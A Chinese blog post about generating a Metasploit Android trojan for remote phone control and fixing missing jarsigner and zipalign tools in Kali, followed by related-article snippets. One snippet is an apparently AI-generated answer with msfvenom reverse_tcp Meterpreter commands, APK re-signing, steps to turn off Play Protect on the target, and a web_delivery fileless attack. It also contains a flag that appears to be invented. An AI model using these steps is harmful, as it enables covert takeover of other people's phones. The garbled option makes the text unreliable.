Metasploit远程控制安卓手机,jarsigner(工具找不到)签名使用问题zipalign(工具)及解决方法

最新推荐文章于 2023-11-30 17:29:29 发布
原创 最新推荐文章于 2023-11-30 17:29:29 发布 · 5.9k 阅读 · 45 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#jarsigner工具找不到 #zipalign工具及解决方法

本文讲述了在Kalilinux 2020.3版本中使用Metasploit生成安卓木马时遇到的工具问题,重点介绍了如何解决keytool、jarsigner和zipalign缺失,以及后续发现的openjdk-11-jdk-headless安装的重要性。
部署运行你感兴趣的模型镜像

问题点:

1.kali linux2020.3版本,在使用msf生成安卓木马时远控手机,签名时需要3个工具,分别是keytool,jarsigner,zipalign,只提示有keytool工具,jarsigner和zipalign工具找不到.

2.在模拟器中成功,但很多命令执行不成功,在手机上面直接不成功。

解决方法:

step1: 命令:keytool -h 提示成功执行,因为keytool集成在了kali linux 中。

step2:命令:jarsigner -h ,提示comand not found 没有此命令,最后找到的办法是在windows10中安装最新版的java环境,15版本是需有keytool,jarsigner工具,并在网上下载zipalign工具。

最终我是在windows10中创建证书,并签名,再把apk拖到kali linux中使用zipalign工具优化apk。

step3::安装zipalign,命令:apt-get install zipalign   ,

 

最终解决方法:

后来发现,jarsigner 没有这款工具的最终原因是因为没有安装jdk软件包,

方法:命令:apt-get update

            命令:apt-get upgrade

            命令:apt-get install openjdk-11-jdk-headless

我使用的是2020.3版本,可以根据不同的版本把jdk的版本提高即可。例:apt-get install openjdk-13-jdk-headless

 

您可能感兴趣的与本文相关的镜像

ACE-Step

ACE-Step

音乐合成
ACE-Step

ACE-Step是由中国团队阶跃星辰(StepFun)与ACE Studio联手打造的开源音乐生成模型。 它拥有3.5B参数量,支持快速高质量生成、强可控性和易于拓展的特点。 最厉害的是,它可以生成多种语言的歌曲,包括但不限于中文、英文、日文等19种语言

MSF手机渗透实验(未成功)(CVE-2019-2215 Binder UA)
qq_33163046的博客
03-03 5543
最近想利用metasploit对手机进行依次渗透实验。通过查看最近三年的安卓漏洞,我对CVE-2019-2215这个漏洞很感兴趣。幸运的是,metasploit里就有这个漏洞的攻击payload,于是我就开始试试了。在环境的准备中,你需要有一个kali环境。5分钟完成 Kali linux安装(基于VirtualBox)_virtualbox安装kali_晓翔仔的博客-优快云博客倒数第二行就是我的中兴手机当然,你需要检查手机安卓的版本,已经只有该漏洞修复前的版本才有成功利用的理论可。
zipalign工具
03-09
文件包括 linux32-android4.4-zipalign linux64-android4.4-zipalign windows-zipalign.exe Linux和WINDOWS下JAVA代码实现,用命令行实现对apk包重新签名打包优化 详见博客地址 http://blog.youkuaiyun.com/hwhanwan/article/details/50834285
Android中APK签名工具jarsigner和apksigner详解
01-05
一.工具介绍 jarsigner是JDK提供的针对jar包签名的通用工具, 位于JDK/bin/jarsigner.exe apksigner是Google官方提供的针对Android apk签名及验证的专用工具, 位于Android SDK/build-tools/SDK版本/apksigner.bat 不管是apk包,还是jar包,本质都是zip格式的压缩包,所以它们的签名过程都差不多(仅限V1签名), 以上两个工具都可以对Android apk包进行签名. 1.V1和V2签名的区别 在Android Studio中点击菜单 Build->Generate signed apk… 打
安卓软件优化工具zipalign
03-03 4121
zipalign工具已经集成在 Android\android-sdk\tools 文件夹内,成为默认工具之一。当使用eclipse导出签名程序时自动运行,未签名程序导出手动签名后需要手动运行工具进行优化。 官方说明文档地址:http://developer.android.com/guide/developing/tools/zipalign.html 以前的一篇对“zipali
报错The jarsigner could not be found. Make sure to run with the build with a JDK。的解决方法
weixin_30552635的博客
04-08 254
这种报错是因为eclipse启动时没有走你设置的jdk路径,eclipse走的路径/bin下没有jarsigner.exe。所以报错,解决办法: 指定eclipse启动jdk 按住alt键,用鼠标拖动eclipse.exe创建一个eclipse启动快捷方式,右键点击快捷方式,属性 在目标一项中添加启动参数 -vm "C:\Program Files (x86)\Java\jdk1.6.0...
Android APK优化工具Zipalign详解
chenaini119的专栏
05-21 3337
最近在googl play上发布apk要优化 这里用android sdk来优化
zipalign优化工具
06-29
zipalign优化工具,android官方网站的说明zipalign是一款重要的优化apk应用程序的工具
简单优化:Zipalign
de14141983的专栏
04-12 225
Android SDK中包含一个“zipalign”的工具,它能够对打包的应用程序进行优化。在你的应用程序上运行zipalign,使得在运行时Android与应用程序间的交互更加有效率。因此,这种方式能够让应用程序和整个系统运行得更快。我们强烈推荐在新的和已经发布的程序上使用zipalign工具来得到优化后的版本——即使你的程序是在老版本的Android平台下开发的。这篇文章将描...
Zipalign安卓优化工具
02-27
Android SDK中包含一个“zipalign”的工具, 它能够对打包的应用程序进行优化。在你的 应用程序上运行zipalign,使得在运行时An droid与应用程序间的交互更加有效率。因 此,这种方式能够让应用程序和整个系统运 行得更快。我们强烈推荐在新的和已经发布 的程序上使用zipalign工具来得到优化后的 版本——即使你的程序是在老版本的Androi d平台下开发的。这篇文章将描述zipalign如 何有助于性能改善以及如何使用它来优化你 的app。在Android中,每个应用程序中储 存的数据文件都会被多个进程访问:安装程 序会读取应用程序的manifest文件来处理与 之相关的权限问题;Home应用程序会读取 资源文件来获取应用程序的名和图标;系统 服务会因为很多种原因读取资源(例如,显 示应用程序的Notification);此外,就是 应用程序自身用到资源文件。在Android中 ,当资源文件通过内存映射对齐到4字节边 界时,访问资源文件的代码才是有效率的。 但是,如果资源本身没有进行对齐处理(未 使用zipalign工具),它就必须回到老路上 ,显式地读取它们——这个过程将会比较缓 慢且会花费额外的内存。
APK优化工具zipalign,apk对齐工具
04-27
直接将apk知道bat文件自动对齐 使用命令行 1、在Android SDK的tools文件夹下,zipalign.exe文件。 2、把你要优化的apk复制到你解压出来的tools文件夹下。 开始->运行->CMD调出命令行窗口 命令行下输入 你解压的文件夹路径\zipalign -v 4 你要优化的apk名字.apk 优化后的apk名字.apk 例如C:\Windows\android-sdk-windows\tools\zipalign -v 4 Example.apk Example.1.apk 其中这里-v代表详细输出,4代表对齐为4个字节。
Android优化工具之——Zipalign
WTBEE的专栏
01-04 6489
Zipalign优化工具是Android SDK中自带的apk优化工具,开发者在上传应用到Google Play的时候相信都遇到过“您上传的Apk没有经过Zipalign处理”的失败提示,显而易见Google对Zipalign工具的重视,那么Zipalign到底有什么用了? 说白了,Zipalign就是一个对Apk文件进行存档对齐的优化工具,它的目的是确保所有的未压缩数据都从文件的开始位置以指定
Android优化工具----zipalign
joe
07-28 345
     Zipalign优化工具是Android SDK中自带的apk优化工具,开发者在上传应用到Google play的时候相信都会遇到过“您上传的APK有没有经过Zipalign处理”的失败提示,显而易见Google对Zipalign工具的重视,那么Zipalign到底有什么用?     说白了,Zipalign就是一个对Apk包里的所有文件进行存档对齐的优化工具,它的目的是确保所有文件里...
zipalign安卓优化工具安装
Alex
11-30 2516
地址:https://developer.android.google.cn/studio,拉到最下面到。下载Linux版Command line tools。
求助:Kali linux中未到命令(bash:xxx:未到命令
热门推荐
weixin_45913240的博客
01-21 1万+
求助:Kali linux中未到命令(bash:xxx:未到命令)bash:jarsigner:未到命令bash:leafpad:未到命令求助,如题 bash:jarsigner:未到命令 在给.apk签名时提示未到命令 bash:leafpad:未到命令 之后在更新源时发现这个也不管用了 求助,如题 ...
androidAPK优化zipalign工具
weixin_43901866的博客
02-13 489
在Android的操作环境中,存储在每个应用程序包的数据文件通过多个进程访问,例如,程序安装工具将读取数据列表确定相关的权限;因为包括显示通知等在内的多种原因,系统服务器可以读取这些资源;主界面应用程序要读取资源以便获取应用程序的名称与图标等。因为Android是基于一个真正的多任务操作基础架构,这些文件是不断地读取。最后但也是最重要的,应用程序本身读取体现的数据 . Android系统中Appl...
()Zipalign——Android apk优化工具
weixin_34092370的博客
04-22 277
在Android SDK中包含了一个工具名为Zipalign,它可以优化你的APK程序包,我们都知道APK的MIME其实就是一个Zip压缩文件,通过Zipalign可以让你的应用程序运行更快,Android123猜测从原理上来讲应该是优化Zip文件的解压速度,毕竟这个工具的文件名为zip对齐。 在Android平台中,数据文件存储在apk文件中,可以多进程的访问,如果你开发过Win32可能知道...
kali控制安卓手机的apk文件版本太旧运行不了
最新发布
12-11
<think>由于用户的问题是关于解决Kali控制安卓手机的旧版本apk文件无法运行的方法,我们需要从几个方面来考虑: 1. 更新Metasploit Framework:旧版本的MSF生成的APK可能不兼容新版的安卓系统。 2. 使用新的Payload或更新生成选项。 3. 对生成的APK进行重新签名,因为旧签名可能不被接受。 4. 考虑安卓系统版本兼容性问题,可能需要降低目标API级别或使用其他手段。 根据引用[1]和引用[2]的内容,我们主要使用msfvenom生成APK,因此解决步骤可能包括: 步骤1:更新Kali Linux和Metasploit Framework 步骤2:生成APK时选择兼容的Payload或调整参数 步骤3:手动处理APK(如重新签名、修改清单文件等) 步骤4:考虑使用其他工具生成兼容的APK 但请注意,这些操作仅限授权场景,切勿用于非法目的。 下面给出详细解答: </think> ### 解决Kali控制安卓手机的旧版本APK文件无法运行的方法使用Metasploit Framework生成的安卓APK因版本过旧无法运行时,可通过以下步骤解决: #### 1. **更新Metasploit Framework** 旧版MSF生成的APK可能不兼容新安卓系统。更新Kali及MSF至最新版: ```bash sudo apt update && sudo apt full-upgrade -y msfupdate ``` 验证版本:`msfconsole -v`[^1] #### 2. **调整Payload生成参数** 使用`msfvenom`时添加兼容性参数: ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=<端口> \ --platform android --arch dalvik \ --min-api 21 \ # 指定最低支持Android 5.0 -o updated.apk ``` - `--min-api 21`:确保兼容Android 5.0及以上系统 - 移除`R>`重定向符避免语法错误[^2] #### 3. **手动重新签名APK** 旧签名可能被系统拒绝,需重新签名: ```bash keytool -genkey -v -keystore my-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000 jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-key.keystore updated.apk alias_name zipalign -v 4 updated.apk signed.apk ``` #### 4. **处理安卓系统限制** - **关闭Play Protect**:在安卓设置中禁用"Google Play保护机制" - **启用未知来源**:允许安装非商店应用(设置 > 安全 > 未知来源) - **针对Android 11+**:在`AndroidManifest.xml`中添加`<uses-permission android:name="android.permission.QUERY_ALL_PACKAGES" />` #### 5. **替代方案:使用Web交付模块** 若APK仍无法运行,改用无文件攻击方式: ```bash msfconsole use exploit/multi/script/web_delivery set target 2 # 选择Android目标 set payload android/meterpreter/reverse_tcp set LHOST <IP> set LPORT <端口> exploit ``` 在目标设备执行生成的终端命令即可触发连接。 #### 注意事项 - 测试前确保设备与Kali在同一网络 - 高版本安卓需动态申请权限,使用`meterpreter`的`android`命令扩展管理权限 - 旧设备可尝试降低`--min-api`值(如19) > **法律声明**:上述方法仅限授权渗透测试使用,未授权操作违反法律[^1]。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值